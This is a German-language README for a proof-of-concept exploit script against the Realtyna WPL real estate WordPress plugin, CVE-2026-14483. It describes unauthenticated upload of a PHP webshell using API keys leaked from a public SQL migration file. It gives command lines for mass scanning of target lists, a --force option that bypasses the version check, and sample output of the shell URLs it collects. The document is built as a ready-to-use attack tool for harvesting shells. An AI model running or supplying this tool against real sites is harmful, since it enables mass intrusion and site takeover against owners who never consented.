
CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS
Nicht authentifizierte Remote-Codeausführung gegen das Realtyna WPL Real Estate Listing WordPress-Plugin.
| Feld | Detail |
|---|---|
| CVE | CVE-2026-14483 |
| Betroffene Version | <= 5.2.0 |
| Plugin | real-estate-listing-realtyna-wpl |
| Auswirkung | Nicht authentifizierter PHP-Webshell-Upload (RCE) |
| Skript | CVE-2026-14483.py |
| Autor | MADEXPLOITS |
Standardmäßig greift das Skript nur Ziele an, die WPL 5.2.0 ausführen. Verwenden Sie
--force, um dies zu überschreiben.
api_key/api_secret werden über einen öffentlichen SQL-Migrationsdump offengelegt.set_property), sodass eine manipulierte PHP-Datei als Immobilienbild hochgeladen werden kann.wp-content/uploads/WPL/{property_id}/.pip install requests colorama
Erstellen Sie eine Textdatei mit einer Basis-URL pro Zeile:
http://wplab.test
https://example.com
python CVE-2026-14483.py --targets targets.txt
Erfolgreiche Shell-URLs werden an result.txt angehängt (oder --output).
python CVE-2026-14483.py \
--targets targets.txt \
--output result.txt \
--user-id 1 \
--max-id 1000 \
--timeout 30 \
--threads 5 \
--debug \
--force
Target URL
│
▼
Detect WPL version (readme.txt / wpl.php)
│ skip unless == 5.2.0 (or --force)
▼
Fetch api_key + api_secret from:
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
│
▼
POST set_property via WPL I/O API
(upload image_0x89MADEXPLOITS.php as image/jpeg)
│
▼
Brute-force property ID 1..max-id
/wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
│
▼
Write shell URL → output file
Standard-Shell-Marker: MADEXPLOITS
Standard-Remote-Dateiname: 0x89MADEXPLOITS.php
Einzelnes Laborziel (dieser Arbeitsbereich):
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug
Massen-Scan mit höherer Parallelität:
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt
Exploit erzwingen, wenn die Versionsprüfung fehlschlägt:
python CVE-2026-14483.py --targets targets.txt --force
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.
result.txt enthält eine Shell-URL pro Zeile.
Stable tag: / Version: in der Plugin-Datei readme.txt gelesen, mit Fallback auf wpl.php.--max-id.| Argument | Standard | Beschreibung |
|---|
--targets | (erforderlich) | Datei mit Basis-URLs (eine pro Zeile) |
--output | result.txt | Datei, an die gefundene Shell-URLs angehängt werden |
--user-id | 1 | WordPress-/WPL-Benutzer-ID, die die neue Immobilie besitzt |
--payload | integrierte Upload-Shell | Benutzerdefinierter PHP-Payload-String |
--max-id | 1000 | Maximale Immobilien-ID zum Durchsuchen (Brute-Force) beim Auffinden der Shell |
--timeout | 30 | HTTP-Timeout in Sekunden |
--threads | 5 | Parallele Worker-Threads |
--debug | off | Ausführliche Debug-Protokollierung |
--force | off | Exploit auch ausführen, wenn Version ≠ 5.2.0 oder Version nicht erkannt werden kann |